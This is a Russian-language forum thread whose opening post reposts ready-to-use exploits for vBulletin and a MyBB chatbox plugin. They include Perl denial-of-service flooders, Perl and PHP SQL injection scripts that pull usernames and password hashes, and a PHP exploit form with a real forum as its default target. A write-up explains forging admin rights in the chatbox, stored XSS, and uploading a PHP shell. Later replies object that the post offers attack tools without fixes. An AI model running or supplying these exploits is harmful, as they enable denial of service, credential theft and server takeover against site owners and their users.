[Проблема]

По возможности буду здесь выкладывать как и sql уязвимости, так и XSS.

Если что-то неправильно написано, исправьте.


Уязвимость vB 4

#!/usr/bin/perl
#####################################
# Vbulletin misc Page Denial of Service
# Version: 4.*.*
# Code Written By Amir
# Site : Www.IrIsT.Ir - Www.IrIsT.Ir/forum - Www.IrIsT.Ir/en
# Facebook Page : https://www.facebook.com/pages/IrIsT...88307267857573
# Greats : All Member In IrIsT.Ir
#####################################
use IO::Socket;

$host = $ARGV[0];
$path = $ARGV[1];

if(!$ARGV[1])
{
print "################################################# \n";
print "## Vbulletin misc Page Denial of Service\n";
print "## Discoverd By Amir \n";
print "## Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## host.com /Vbulletin/\n";
print "################################################# \n";
exit();
}
for($i=0; $i<99999; $i++)
{
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
$post = "do=getsmilies&result=%0%0%0%0%0%0%0";
$pack.= "POST " .$path. "/misc.php HTTP/1.1\r\n";
$pack.= "Host: " .$host. "\r\n";
$pack.= "User-Agent: Googlebot/2.1\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: " .length($post). "\r\n\r\n";
$pack.= $post;
print $socket $pack;
syswrite STDOUT, "*";
}

XSS Уязвимость продутка ChatBox v.3.6.0

# Exploit Title: Multiple vulnerabilities in ChangUonDyU - Extra File Chatbox
# Date: 03.02.2013
# Author: Inquiry from http://crackhackforum.com
# Vendor or Software Link: http://community.mybb.com/thread-63559.html
# Software Link: community.mybb.com/attachment.php?aid=17079
# Version: Affected are all versions up to 3.6.2
# Google Keywords:
# Tested on: Opera 12.15 & FireFox 21
##Greetings to all http://crackhackforum.com members.##

########################################################################################
[Introduction]
ChangUonDyU - Extra File Chatbox is a MyBB plugin used for live chatting with other users on the forum. The developer was probably quite lazy(no offense) because of the high amount of vulnerabilities in the plugin. With a short look there exists several persistent Cross Site Scripting vulnerabilities, Code Execution and Authentication Vulnerability. Despite the XSS and Code Execution are the most dangerous in the list, Authentication vulnerability makes it all possible to happen. The impact of the vulnerability is very dangerous and combining all these could lead to defacing. To be exact it's possible to upload a shell to the target server and with just being a regular user. The concept is actually easy, A regular member is able to register the forum and use the shoutbox. As there is a 'small' Authentication vulnerability the regular member with no permissions at all is able to gain Administrator privileges to perform the actions any person with real privileges is able to. Yet with having Administrator privileges it's possible to trigger several XSS's and Code Execution. With persistent XSS we're able to steal the Security tokens of Administrator to perform CSRF & with Code Execution we're able to execute our shell on the targets system.

[0x01 XSS]
Actually there's no XSS protection at all and all the forms are vulnerable to it. The ones which are appearing the most are with the 'Ban User' command and 'Notice' command. In this example I'll tell you the XSS with the Ban command because we'll upload the shell with the /notice command.
Banning works by entering a banning command which states the user ID and banning reason as such : /ban 1(bans the person with ID 1 in the forum) Advertising(The reason which goes to the logs to review incase you'd like to unban). By removing the banning reason with the XSS payload, it'll be executed.

Example : Original & XSS banning commands which will ban the person with User ID 1 which is mostly Administrator
Original : /ban 1 advertising
Malicious : /ban 1 <script>alert('1')</script>

Note: XSS won't disappear after unbanning the user, no matter if you're even re-banning him several times. As the messge goes to the Archive of the shoutbox, it'll leave only after using the /prune command to clear the chatbox & it's archive.
The questions remains, how we're able to use it because only administrators and Staffs/Moderators are able to ban. There's also a solution to this, if you read the above then you know that there's also a Authentication vulnerability which allows us to gain the rights. Scroll down the page to find out how although I suggest to keep reading.

Proof of Concept :
function build_ban($shout)
{
global $config,$phrase;
$text = "ban > $shout[userid] > $shout[username] > $shout[dateline] > <span class='smallfont'>#<b>$shout[username]</b> ";
if (!empty($shout['banusername']))
{
$text .= "$phrase[banned_name] <a href='http://{$config['cbforumlink']}/member.php?action=profile&uid=$shout[banuserid]' target='_blank'>$shout[banusername]</a>";
}
else
{
$text .= "$phrase[banned] <a href='http://{$config['cbforumlink']}/member.php?action=profile&uid=$shout[banuserid]' target='_blank'>$shout[banuserid]</a>";
}
if ($shout['reason']) $text .= ". <i>$phrase[reason]: $shout[reason].</i>";
$text .= '#</span>';
return $text;
}

[0x02 Code Execution]
Like I told above there are several vulnerabilities and alot of XSS's and almost all the forms in the chatbox's Cpanel aren't having any kind of protection. So doesn't have the /notice page it either. It's actually quite easy to trigger the XSS in there because we just have to insert our payload as a Notice, but as I said there's no protection which gives us an oppornutunity for Code Execution. You're almost all smart enough in here I assume that you know what that means, but I'll go through it with a sentence to make it clear to everyone. With entering XSS payload as the notice such as <script>alert('1')</script> it'll be executed. Yet we can replace the XSS payload with the code we'd like and that code could be a PHP shell and it'll be executed on the server and gives us access to it. Yet again we don't have any permissions to trigger the Code Execution, but read below because there's the solution. The downside of this is that you can access the shell through the shoutbox and that's obvious as we executed the shell through the shoutbox's notice. You can use any of these 404:forbidden shells because that'll give you some extra time yet that's enough to make another backdoor and put the shoutbox working again although it works, just the notice will appear as a 404:forbidden.

Proof of Concept :
function build_notice()
{
global $fcbfile,$smilies;
$noticef = file_get_contents($fcbfile['notice']);
$handle = fopen($fcbfile['ds_notice'],"w");
if ($noticef)
{
$noticef = BBCode($noticef);
$noticef = strtr($noticef, $smilies);
}
fwrite($handle, $noticef);
fclose($handle);
}

[0x03 Authentication Vulnerability]
That's probably the most interesting finding in the whole package, atleast it is in my sight and that's the point which makes the two above & one below possible. When I was looking for various security risks in the plugin I also opened up HTTP live header which is a popular FireFox addon for viewing the HTTP traffic going by. With chatting to myself in the WAMP I also took a look at the HTTP headers and noticed that the HTTP requests for posting a message in the shoutbox and it looked as following :

Explained : http://host.ltd/[path]/chatbox/index.php?do=postshout&key=[SSID]&userid=1000&groupid=1&username=<span style="color: [The color of the username];"><strong>[Name]</strong></span>&message=[Message]
Real request : http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=2&groupid=1&username=<span style="color: #5EFF00;"><strong>Inquiry</strong></span>&message=Inquiry

That made me think how did the developer managed to verify that the request is coming from a legitimate user. By seeing the previous work of the developer I were sure that I'm also able to find something out of there because verifying or locking the permissions would be quite hard for him. With few minutes I thought how he most likely organized the "who has permissions to use commands" list and I thought that probably by gving them to the persons who're having the group ID of Administrators and Moderators/Staffs. And that's the point where I were quite sure that there probably even isn't any kind of protection. I decided to try my luck on that one and replaced the original request with this :

http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>&message=Admin
Like you can see I've changed some details with the original request. Actually almost all the data except the Security Token which protects against CSRF. I have changed the "UserID" from 2 to 1, "GroupID" from 1 to 4, "Color:" from #5EFF00 to #FF0000 and "Username" from Inquiry to Crackhackforum. Then let's give it a shot and load the request. After proccessing the request, there should appear a new message in the shoutbox. Yet now the username doesn't appear as yours, but as a Administrators. Your User ID doesn't show up as yours, but as Administrator's. And by the way how the developer gives permission of the shoutbox, by the group ID, you also have that one as Administrator as GroupID=4 belongs to Administrators. Also the username will look red like it is in most of MyBB forums. The best thing about is that you really are looking as a legitimate username and even another Administrator can't make sure that you're the wrong one. The conclusion we can make from here is that you're now a LEGIT administrator of the shoutbox and absolutely nobody can't claim otherwise. That's fun to play a Administrator on a random forum indeed, but we're still trying to make some more progress and go further. Like we know, we're being shown as Administrators and with the Administrator place there comes permissions to ban, prune & give new notices and alot more. That's how we're trying to make some progress.
Now we'll test is our hint correct and are we able to use the Administrator's privileges. For that we'll just use a simple pruning command to see if it takes affect and if it does then it means we're successful. The pruning command would look as such then :

http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>&message=/prune

It worked and the shoutbox is being pruned by an Administrator which in this case are us. Now here are coming in the two previous findings above. First I'll show you how to use the banning command to perform XSS attack and as we're in the forum it might cause everything that XSS causes, but you can even create a small XSS worm with it in the forum.

http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>&message=/ban 1000 [XSS payload]
As we already know that we're Administrators with legit privileges it isn't a surprise for us that also that one works and the XSS will be executed. The second thing is adding the new notice which goes mainly through the chatbox's Cpanel where we don't have access, but it's also possible to update the notice through the shoutbox with a simple command which I'll show you.

http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>&message=/notice [<?php PHP shell goes here ?>]

After proccessing this code it'll be executed and you have your shell on the server which will give you permission to the whole database to do whatever you'd like.
Note*: You have to click the link(e.g posting it to the shoutbox and then clicking it) or otherwise the request won't be processed.
Note*: You have to either decode the URL or remove the spaces. It's because you have to click the link, but if there are spaces then the URL will be read to the first space.
Note*: Your shoutbox might use the colors name instead of HEX values. It depends on the shoutbox you're using.
Proof of Concept :
##### POST SHOUT #######
if ($_REQUEST['do'] == 'postshout')
{
$managegroup = explode(",", $config['managegroup']);
$shout = $_REQUEST;

if ($config['check_domain_reffer'] AND !checkpost($config['forumlink'] , $_SERVER['HTTP_REFERER']))
{
echo $phrase['accessdenied'];
exit;
}

$request_ip = $_SERVER['REMOTE_ADDR'];

if ($config['strip_slash'])
{
$shout['username'] = stripslashes($shout['username']);
$shout['message'] = stripslashes($shout['message']);
}

if ($config['check_chatbox_key'] AND !check_chatbox_key($shout['key'], $shout['userid'], $shout['username'], $shout['groupid']))
{
echo $phrase['accessdenied'];
exit;
}

$banneds = unserialize(file_get_contents($fcbfile['ds_banned']));

$cancommand = false;
if (in_array($shout['groupid'], $managegroup))
{
$cancommand = true;
}

if ($shout['message'] && $shout['userid'])
{
// CHECK BANNED USER
if (isset($banneds[$shout['userid']]))
{
echo $phrase['bannotice'];
exit;
}

[0x04 XSS & HTML injection on the HTTP request]
That's probably the same dangerous as the first XSS and comparing it to those vulnerabilities above it's basically nothing. Yet if I wouldn't find the other ones then it would be a critical one and I think it's worth to be mentioned. It's kinda related to the above vulnerability which means the /index.php?do=postshout can be exploited in several ways. Again, comparing to the above vulnerabilities it's kinda useless although maybe the Administrator blocks the other vulnerabilities and then it could work out. I think that expalaining of this doesn't need any further sentences because you can understand it from the link :

http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span><Here goes HTML or XSS>&message=CrackHackForum

Proof of Concept : The same as it's with the 0x03
##Greetings to all http://crackhackforum.com members and specially to BaseHack Network crew members Thallium, DES and Vash.##

# 700E38F66557523E 1337day.com [2013-04-30] 49F1383FFBD3B9F7 #

vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

# Exploit Title: vBulletin 5 Beta XX SQLi 0day
# Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
| vBulletin 5 Beta XX SQLi 0day |
| Author: Orestis Kourides |
| Web Site: www.cyitsec.net |
+===================================================+
";

if (@ARGV != 5) {
print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
exit;
}

$host = $ARGV[0];
$path = $ARGV[1];
$username = $ARGV[2];
$password = $ARGV[3];
$magicnum = $ARGV[4];
$encpath = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
[
'url' => $encpath,
'username' => $username,
'password' => $password,
],
Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
],
User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;

Vbulletin xmlsitemap Page Denial of Service

#!/usr/bin/perl
#####################################
# Vbulletin xmlsitemap Denial of Service
#
# Version: 4.*.*
#
# Code Written By Amir
#
# Home : Www.IrIsT.Ir - www.irist.ir/forum
#
# Greats : B3HZ4D - C0dex - TaK.FaNaR - Beni_Vanda - 0x0ptim0us - skote_vahshat
#
# IR Anonymous - silent - Mr.epsilon - sajjad13and11 - Mr-Fardin & All Member In IrIsT.Ir
#
#####################################
use IO::Socket;

$host = $ARGV[0];
$path = $ARGV[1];

if(!$ARGV[1])
{
print "################################################# \n";
print "## Vbulletin xmlsitemap Denial of Service\n";
print "## Discoverd By Amir \n";
print "## Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## host.com /Vbulletin/\n";
print "################################################# \n";
exit();
}
for($i=0; $i<99999; $i++)
{
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
$post = "sitemap_filename=%1%1%1%1%1%1%1%1%1%1%1%";
$pack.= "POST " .$path. "/xmlsitemap.php HTTP/1.1\r\n";
$pack.= "Host: " .$host. "\r\n";
$pack.= "User-Agent: Googlebot/2.1\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: " .length($post). "\r\n\r\n";
$pack.= $post;
print $socket $pack;
syswrite STDOUT, "*";

vBulletin 3.x / 4.x AjaxReg SQL Injection

#!/usr/bin/php
<?

# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://lh3.googleusercontent.com/-4...5s3%2520AM.png
# livedemo : http://www.youtube.com/watch?v=LlKaYyJxH7E
# check it : http://localhost/vBulletin/clientscript/register.js

function usage ()
{
echo
"\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
"\n[+] Author: Cold z3ro".
"\n[+] Site : http://www.hackteach.org | http://www.s3curi7y.com".
"\n[+] vandor: http://www.vbulletin.org/forum/showthread.php?t=144869".
"\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
"\n[+] Ex. : php 0day.php localhost /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
"\n[+] Note. : Its a 0day exploit\n\n";
exit ();
}

function check ($hostname, $path, $field, $pos, $usid, $char)
{
$char = ord ($char);
$inj = 'ajax.php?do=CheckUsername&param=';
$inj.= "admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
$culr = $hostname.$path.$inj;
$curl = curl_init();
curl_setopt ($curl, CURLOPT_URL, $culr );
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_VERBOSE, 0);
ob_start();
curl_exec ($curl);
curl_close ($curl);
$con = ob_get_contents();
ob_end_clean();
if(eregi('Invalid',$con))
return true;
else
return false;
}


function brutechar ($hostname, $path, $field, $usid, $key)
{
$pos = 1;
$chr = 0;
while ($chr < strlen ($key))
{
if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
}


if (count ($argv) != 4)
usage ();

$hostname = $argv [1];
$path = $argv [2];
$usid = $argv [3];
$key = $argv [4];
if (empty ($key))
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

echo "[+] Username: ";
brutechar ($hostname, $path, "username", $usid, $key);
echo "\n[+] Password: ";
brutechar ($hostname, $path, "password", $usid, $key);
echo "\n[+] Done..";
echo "\n[+] It's not fake, its real.";
# word to 1337day.com, stop scaming me

?>

vBulletin 3.x / 4.x / 5.x remote SQL Injection PHP exploit

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body {background-color: black; font-family: Verdana; font-size: 10pt; color: #d9d9d9; margin: 30px; 30px; auto; background-attachment: fixed; background-image: url('https://lh6.googleusercontent.com/-C-Zv0fYrOtU/UJgYzWMMUiI/AAo/3UyiI7kIcQo/s600/back4.jpg'); background-repeat: no-repeat; background-position: right bottom;}
div { margin: 30px; 30px; auto; }

</style>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title> vBulletin 3.x / 4.x / 5.x remote SQL Injection PHP exploit [b][y] Cold z3ro </title>
</head>
<body>

<form method="post"/>
<table width="100%" border="0">
<tr>
<td>target</td>
<td><input type="text" value="<? if($_POST[host]) {echo $_POST[host]; }else{echo 'http://forum.dnevno.hr/';} ?>" name="host" size="70" />
</td>
</tr>
<tr>
<td>userid</td>
<td><input type="text" value="<? if($_POST[uid]) {echo $_POST[uid]; }else{echo '1';} ?>" name="uid" size="6" /><input type="submit" name="exp" value="Exploit-it"/></td>
</tr>
</table>
</form>

<div>

<?php

/**
* @exploit vBulletin 3.x/4.x/5.x ( quick_replay ) remote SQL Injection PHP exploit
* @author Cold z3ro
* @site http://www.hackteach.org , http://www.s3curi7y.com
* @copyright 26-12-2012
* @about it Its depends on ajax.php file, and comments quick replay via ajax file if anabled.
* @Note This exploit coded for english language vBulletin forums,
* @Note. non english exploit will faild,you need to exploit it manually
* @Note. or to edit some variables depends on the fourm main language.
* @Note. Exploit takes time while executing.
* @type 0day, danger
**/

set_time_limit(0);
ini_set('user_agent', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)');

function fetchinj( $string, $str, $end ){
$string = " ".$string;
$ini = strpos( $string,$str );
if ($ini == 0) return "";
$ini += strlen( $str );
$len = strpos( $string,$end,$ini ) - $ini;
return substr( $string,$ini,$len );
}

function pagethis( $surl ){
$ch = curl_init();
curl_setopt ( $ch, CURLOPT_URL, $surl );
curl_setopt ( $ch, CURLOPT_HEADER, 0 );
ob_start();
curl_exec ( $ch );
curl_close ( $ch );
$data = ob_get_contents();
ob_end_clean();
return $data;
}

if ($_POST['exp']){
$host = $_POST['host'];
$uid = $_POST['uid'];

if( !eregi('http://', $host)){
die('use "http://" in the link you moron');
}else{

$back = substr($host,-1,1);
if ($back !="/"){
$lnk = "/ajax.php";
}else{
$lnk = "ajax.php";
}

$lnk.= '?do=';
$lnk.= 'quick_replay';
$lnk.= "&t=";

# checking site requirement
$link2check = pagethis( $host.'showthread.php?t=210' );
$_link2check = pagethis( $host.'showthread.php?t=400' );
$check1 = strstr( $link2check, 'You are not logged' );
$check2 = strstr( $link2check, 'If you followed a valid link' );
$check3 = strstr( $_link2check, 'If you followed a valid link' );

if( $check1 == true ){
die('Exploit Faild: target need login authentication');
}else if( $check2 == true and $check3 == true ){

# make the exploit exactly and much better
# looking for 25 $_GET[t];
for( $i=5; $i<30; $i++ ){
$multicheck = pagethis( $host.'showthread.php?t='.$i.'' );
$what2check = strstr( $multicheck, 'vBulletin Message' );
$found = array( $what2check );
foreach ( $found as $value => $val ){
if ( !$val[0] )
break 2;
}

}

}

# Injecton SQL.
$exp = '+union+select+1,2,3,';
$exp.= 'concat(0x7a33726f31,username,0x0d0a,password,0x7a33726f32)';
$exp.= ',5,6,username,8,9,10,11,12,13,14,15,16,17';
$exp.= '+from+user+where+';
$exp.= 'userid='.$uid.'--';

if ( $i ){
$exp = $host.$lnk.$i.$exp;
}else{
$exp = $host.$lnk.'32'.$exp;
}

$extinj = pagethis( $exp );
$result = fetchinj( $extinj, 'z3ro1', 'z3ro2' );
//print_r($result);

if ( $result[1] ){
echo 'Exploit fineshed :<br><br>'.$result;
}else{
echo 'Exploit Faild';
}
}
}

# Eof

?>
</div>

</body>
</html>

Я думаю каждую уязвимость нужно оформлять в отдельную тему.

+ выложенные тобой уязвимость - это копипаст с милки + они стары как мир...

народ вы что англичане чтоли???
по русски нельзя сразу написать? да хоть на украинском напишите и то понятней будет

siriusmelaf,

скрипты написана на инглише, так что все нормально. А вот написать рекомендации по устранению - вот это было бы бесценно.

И кстати, меня одного смутило, что об уязвимостях даже не написано, тупо скинуты сплойты...

Предлагаю вообще за такое забанить ТС

Все-таки это прямо относится к взлому и хакерству, но никак не к безопасности... + я больше чем уверен, что ТС не знает, как ими пользоваться и с чем их есть...

Quote:

Originally Posted by StenLi

я больше чем уверен, что ТС не знает, как ими пользоваться и с чем их есть...

И что?
Я тоже не знаю и не хочу знать, меня тоже забанить?

Вдруг кому-то захочется разобраться.

Quote:

Originally Posted by Sven

И что?
Я тоже не знаю и не хочу знать, меня тоже забанить?
Вдруг кому-то захочется разобраться.

Эм.. Обьясню: эксплойт - инструмент взлома. А это уже СТ УК РФ, как распространение ПО для блаблабла.

Я думал данный раздел для того, чтобы выкладывать патчи и устранять уязвимости, но не для того, чтобы выкладывать орудия для хацкенга....

Большинство даже не смогут их заюзать, так что это не орудие

Quote:

Originally Posted by siriusmelaf

народ вы что англичане чтоли???
по русски нельзя сразу написать?

*посыпает голову пеплом...*
видимо, это моя недоработка
не указала в Правилах раздела, что ориентироваться нужно на русскоязычных админов
в своё оправдание могу сказать: ну как-то само собой подразумевалось, что на русскоязычном ресурсе принято сопроводительный текст писать именно по русски

===
Liked, я ведь предполагала, что так и будет
и именно поэтому напомнила Вам о необходимости сначала прочитать правила раздела

Quote:

Originally Posted by Luvilla

Дыры, фиксы, патчи; взломы и устранение последствий взломов; хакерские штучки и методы борьбы с ними [...]

Запрещается перепост хакерских инструкций с других ресурсов

"хакерские штучки и методы борьбы с ними"
где?
где методы борьбы?
где описание, как оградить себя?

Посмотрите, как оформлены другие темы этого раздела: краткое описание уязвимости, обязательно по-русски, и рекомендации, что делать

Quote:

Originally Posted by StenLi

СТ УК РФ, как распространение ПО для блаблабла.

Это тоже самое, что и пиратская вобла. Нарушение авторских прав Статья 146 УК